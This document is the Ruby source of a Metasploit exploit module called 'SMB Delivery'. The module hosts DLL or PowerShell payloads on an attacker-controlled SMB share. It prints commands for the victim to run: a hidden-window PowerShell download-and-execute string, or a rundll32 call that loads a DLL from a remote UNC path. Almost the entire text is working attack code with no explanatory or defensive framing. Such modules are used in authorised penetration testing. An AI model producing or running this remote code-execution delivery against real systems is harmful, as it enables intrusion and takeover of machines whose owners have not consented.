SMB Delivery Module

`require 'msf/core'  
require 'msf/core/exploit/powershell'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::EXE  
include Msf::Exploit::Remote::SMB::Server::Share  
include Msf::Exploit::Powershell  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "SMB Delivery",  
'Description' => %q{  
This module serves payloads via an SMB server and provides commands to retrieve  
and execute the generated payloads. Currently supports DLLs and Powershell.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Andrew Smith',  
'Russel Van Tuyl'  
],  
'References' =>  
[  
['URL', 'https://github.com/rapid7/metasploit-framework/pull/3074']  
],  
'Payload' =>  
{  
'Space' => 2048,  
'DisableNops' => true  
},  
'Platform' => 'win',  
'Targets' =>  
[  
['DLL', {  
'Platform' => 'win',  
'Arch' => [ARCH_X86, ARCH_X86_64]  
}],  
['PSH', {  
'Platform' => 'win',  
'Arch' => [ARCH_X86, ARCH_X86_64]  
}]  
],  
'Privileged' => false,  
'DisclosureDate' => "Jul 26 2016",  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('FILE_NAME', [ false, 'DLL file name', 'test.dll'])  
], self.class)  
  
deregister_options('FILE_CONTENTS')  
end  
  
def primer  
print_status('Run the following command on the target machine:')  
case target.name  
when 'PSH'  
self.file_contents = cmd_psh_payload( payload.encoded,  
payload_instance.arch.first,  
remove_comspec: true,  
use_single_quotes: true)  
  
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl  
download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(unc)  
download_and_run = "#{ignore_cert}#{download_string}"  
print_line generate_psh_command_line( noprofile: true,  
windowstyle: 'hidden',  
command: download_and_run)  
when 'DLL'  
self.file_contents = generate_payload_dll  
print_line("rundll32.exe #{unc},0")  
end  
end  
end  
`